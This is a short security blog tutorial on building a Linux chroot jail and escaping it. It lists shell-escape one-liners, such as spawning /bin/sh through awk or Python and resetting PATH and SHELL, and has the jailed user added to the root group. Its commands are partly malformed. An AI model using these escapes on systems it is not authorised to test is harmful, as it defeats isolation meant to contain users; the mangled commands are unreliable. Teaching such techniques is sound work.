January 21, 2020

Escaping Linux CHROOT Jail

chiheb chebbi
Share

Introduction

Isolation is a security approach provided by many computer systems. It is based on splitting the system into smaller independent pieces to make sure that a compromised sub-system cannot affect the entire entity. This approach is present in every modern operating system (e.g User accounts, process address spaces etc..).

Chroot Jail is a way to separate a process that doesn’t run as root and its children from the rest of the system by creating a Jail using chroot() system call (system call is an interface between an application and the Linux kernel). The idea is to create a directory and make the process think that it is in the root folder and not letting it access or modify outside that jail. Let’s see how to build this jail and how to escape it. Setup a Prisoner userCreate a new user: sudo adduser prisoner

Add prisoner to root group:  sudo gpasswd -a prisoner root

(Check by visiting the /etc/group path)Create a Chroot folder: mkdir chrootEnter chroot (cd /chroot ) and create : bin, dev, etc, home, home/prisoner, lib, var,  usr, usr/bin folders:  mkdir bin dev  etc home  home/prisoner, lib, var, usr, usr/bin(We need at least bin and lib directory inside the jail.)

Now let’s copy the bash shell utility that we want the prisoner user to be able to use.Type:  cp /bin/bash /chroot/bin/To make sure that the bash shell will work properly we need to locate its necessary libraries and copying them to /lib jail folder:  ldd/bin/bash

Now, let’s use the Magic Chroot command: sudo chroot /chroot  /bin/bashPs: if you get this error: chroot: failed to run command ‘/bin/bash’ no such file or directory please check this answer.

Voila!

Escaping the jail:

Now let’s see how to escape this type of jails:

  1. First, we need to guess the available commands by just typing some commands: cd, ls, pwd, cp, vi etc… to know what we can use to escape.
  2. Know the $SHELL and the $PATH variables using: echo $PATH and echo $SHELL.
  3. There are different methods and ideas to escape the jail for example:
  • If ‘/’ is available just run /bin/bash.
  • If ‘set’ is available use: export PATH=/bin:/usr/bin:$PATH      

           and export SHELL=/bin/sh

  • Use other system commands e.g: awk ‘BEGIN {system(“/bin/sh”)}’
  • Use scripting language e.g: python – c  ‘import os;os.system(“/bin/bash”)’  

References:

[1] http://www.adminarticles.com [2] https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

Start learning with Cybrary

Create a free account

Related Posts

All Blogs
Building a Security Team
June 27, 2023

Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It

A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.

Read More
Building a Security Team
June 28, 2023

How to Build a Red Team

An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.

Read More
Tools & Applications
June 7, 2023

How to Make the Most of Blending Learning with Cybrary Live

Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.

Read More
News & Events
June 7, 2023

Introducing the New Cybrary Learner Experience

Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.

Read More